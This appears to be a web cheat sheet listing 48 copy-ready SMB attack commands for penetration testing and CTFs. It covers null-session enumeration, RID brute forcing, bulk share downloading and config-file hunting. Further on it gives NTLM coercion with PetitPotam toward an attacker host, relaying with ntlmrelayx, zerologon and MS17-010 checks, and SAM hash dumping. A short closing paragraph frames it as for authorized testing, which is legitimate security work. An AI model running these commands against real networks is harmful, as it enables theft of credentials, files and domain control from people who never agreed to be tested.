SMB enumeration commands for null sessions, share hunting, and user/group discovery using smbclient, enum4linux-ng, rpcclient, nmap, and crackmapexec/netexec. (48 payloads)
nmap -p 139,445 --open -oG smb.gnmap 10.10.10.0/24
nmap -p445 --script smb-protocols 10.10.10.10
nmap -p445 --script smb-os-discovery 10.10.10.10
nmap -p445 --script smb-security-mode,smb2-security-mode 10.10.10.10
nxc smb 10.10.10.0/24
crackmapexec smb 10.10.10.10 --gen-relay-list relay_targets.txt
nbtscan -r 10.10.10.0/24
smbclient -L //10.10.10.10 -N --option='client min protocol=NT1'
smbclient -L //10.10.10.10 -N
smbclient -L //10.10.10.10 -U 'guest%'
nxc smb 10.10.10.10 -u '' -p ''
nxc smb 10.10.10.10 -u 'a' -p ''
rpcclient -U '' -N 10.10.10.10
nxc smb 10.10.10.10 -u '' -p '' --shares
enum4linux-ng -A -u '' -p '' 10.10.10.10
smbmap -H 10.10.10.10 -u null -p ''
enum4linux-ng -A -u user -p 'Password1' 10.10.10.10
nxc smb 10.10.10.10 -u user -p 'Password1' --shares
nxc smb 10.10.10.10 -u user -p 'Password1' --users
nxc smb 10.10.10.10 -u user -p 'Password1' --groups
nxc smb 10.10.10.10 -u user -p 'Password1' --pass-pol
nxc smb 10.10.10.10 -u user -p 'Password1' --loggedon-users
nxc smb 10.10.10.10 -u user -H <NThash> --shares
smbmap -H 10.10.10.10 -u user -p 'Password1' -R --depth 5
rpcclient -U '' -N 10.10.10.10 -c 'enumdomusers'
rpcclient -U '' -N 10.10.10.10 -c 'enumdomgroups'
rpcclient -U '' -N 10.10.10.10 -c 'querygroupmem 0x200'
rpcclient -U '' -N 10.10.10.10 -c 'queryuser 0x1f4'
nxc smb 10.10.10.10 -u guest -p '' --rid-brute 10000
lookupsid.py [email protected] -no-pass
rpcclient -U '' -N 10.10.10.10 -c 'lsaquery'
rpcclient -U '' -N 10.10.10.10 -c 'getdompwinfo'
smbclient //10.10.10.10/Share -U 'user%Password1'
smbclient //10.10.10.10/Share -N -c 'recurse ON; ls'
smbclient //10.10.10.10/Share -N -c 'prompt OFF; recurse ON; mget *'
nxc smb 10.10.10.10 -u user -p 'Password1' -M spider_plus
nxc smb 10.10.10.10 -u user -p 'Password1' -M spider_plus -o DOWNLOAD_FLAG=True
smbmap -H 10.10.10.10 -u user -p 'Password1' -A '\.(conf|ini|xml|txt)$'
smbmap -H 10.10.10.10 -u user -p 'Password1' --download 'Share\flag.txt'
mount -t cifs //10.10.10.10/Share /mnt/smb -o username=user,password=Password1
nmap -p445 --script smb-vuln-ms17-010 10.10.10.10
nxc smb 10.10.10.10 -u user -p 'Password1' -M zerologon
nxc smb 10.10.10.0/24 -u user -p 'Password1' -M coerce_plus
PetitPotam.py -u user -p 'Password1' -d domain.com <attacker_ip> <DC_ip>
ntlmrelayx.py -tf relay_targets.txt -smb2support
ntlmrelayx.py -t ldap://<DC_ip> --delegate-access -smb2support
nxc smb 10.10.10.10 -u user -p 'Password1' --sam
nxc smb 10.10.10.10 -u user -p 'Password1' --shares --filter-shares READ WRITE
This cheat sheet is a quick-reference collection of 48 SMB Enum payloads for testing SMB Enumeration vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or use the Network Recon & Exploitation to apply them interactively. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all SMB Enum payloads are completely free, with no account required. Everything runs in your browser.